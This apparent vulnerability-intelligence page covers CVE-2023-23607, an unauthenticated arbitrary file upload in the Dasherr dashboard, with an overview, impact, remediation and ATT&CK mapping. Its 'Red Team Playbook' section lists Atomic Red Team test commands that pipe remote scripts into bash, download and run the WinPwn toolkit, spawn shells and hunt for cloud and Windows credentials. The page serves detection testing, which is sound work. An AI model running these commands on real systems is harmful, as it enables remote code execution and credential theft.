CVE-2023-23607
Overview
The vulnerability is an unrestricted file upload flaw in the erohtar Dasherr dashboard, specifically within the /www/include/filesave.php component. This flaw arises because the file upload mechanism does not enforce restrictions on file types or upload destinations, allowing any file to be saved anywhere on the server. The lack of authentication and insufficient access controls on the upload endpoint enable unauthenticated users to exploit this weakness.
Vulnerability Description
erohtar/Dasherr is a dashboard for self-hosted services. In affected versions unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server. The file /www/include/filesave.php allows for any file to uploaded to anywhere. If an attacker uploads a php file they can execute code on the server. This issue has been addressed in version 1.05.00. Users are advised to upgrade. There are no known workarounds for this issue.
Impact
An unauthenticated attacker can upload and execute arbitrary PHP code on the server, leading to full server compromise including data theft, service disruption, and persistent access. No user interaction or authentication is required, and the vulnerability is remotely exploitable over the network. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the ease of exploitation and high impact on confidentiality, integrity, and availability.
Solution
Users of erohtar Dasherr should upgrade to version 1.05.00 or later, where the unrestricted file upload vulnerability has been addressed. Detailed patch information and remediation steps are available in the vendor advisory at https://github.com/erohtar/Dasherr/security/advisories/GHSA-6rgc-2x44-7phq. No known workarounds exist, so upgrading is the only effective mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the dashboard for self-hosted services presents a critical security flaw due to its unrestricted file upload feature. This flaw allows any unauthenticated user to upload arbitrary files to the server, specifically through the file handling mechanism in the application. The core of the issue lies within the file upload functionality located in the filesave.php script, which does not adequately validate the type of files being uploaded. Consequently, an attacker can exploit this weakness by uploading a malicious PHP script disguised as a benign file. Once uploaded, the attacker can execute arbitrary code on the server, leading to potential full system compromise.
Attack vectors for this vulnerability are straightforward and can be executed with minimal technical expertise. An attacker could leverage tools to automate the process of file upload, targeting the vulnerable endpoint. By crafting a malicious PHP file, the attacker can bypass any existing security measures that do not inspect the content of the uploaded files. Once the file is successfully uploaded, the attacker can trigger the execution of the PHP code by accessing the file directly through the web server. This exploitation scenario can lead to various malicious activities, including data exfiltration, defacement of the website, installation of backdoors, or even lateral movement within the network to compromise other systems.
The real-world implications of this vulnerability are significant, particularly for organizations relying on the affected product for their operations. Successful exploitation can lead to unauthorized access to sensitive data, disruption of services, and damage to the organization’s reputation. The potential for data breaches can result in financial losses, regulatory penalties, and loss of customer trust. Furthermore, the high CVSS score indicates that this vulnerability poses a severe risk, making it imperative for organizations to address it promptly. The absence of known workarounds further exacerbates the risk, as organizations cannot rely on temporary fixes to mitigate the threat.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First and foremost, upgrading to the latest version of the affected product is crucial, as the developers have addressed the issue in version 1.05.00. Additionally, organizations should enforce strict file upload policies that include validating file types, implementing file size limits, and using secure file storage practices. Employing web application firewalls (WAFs) can help detect and block malicious file uploads before they reach the server. Regular security assessments and penetration testing can also aid in identifying and remediating vulnerabilities before they can be exploited by attackers.
In conclusion, the unrestricted file upload vulnerability in the dashboard for self-hosted services poses a significant threat to organizations using the affected product. The ability for unauthenticated users to execute arbitrary code on the server can lead to severe consequences, including data breaches and operational disruptions. Organizations must prioritize upgrading their systems and implementing robust security measures to protect against this and similar vulnerabilities. By adopting a proactive security posture, organizations can mitigate risks and safeguard their digital assets against potential threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dasherr Project | Dasherr | All |
cpe:2.3:a:dasherr_project:dasherr:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-23607 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/erohtar/Dasherr/security/advisories/GHSA-6rgc-2x44-7phq |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/erohtar/Dasherr/commit/445325c7cf1148a8cd38af3a90789c6cbf6c5112 |
| vicarius.io |
NVD API
|
https://www.vicarius.io/vsociety/posts/analyzing-arbitrary-file-upload-in-dasherr-cve-2023-23607-23608 |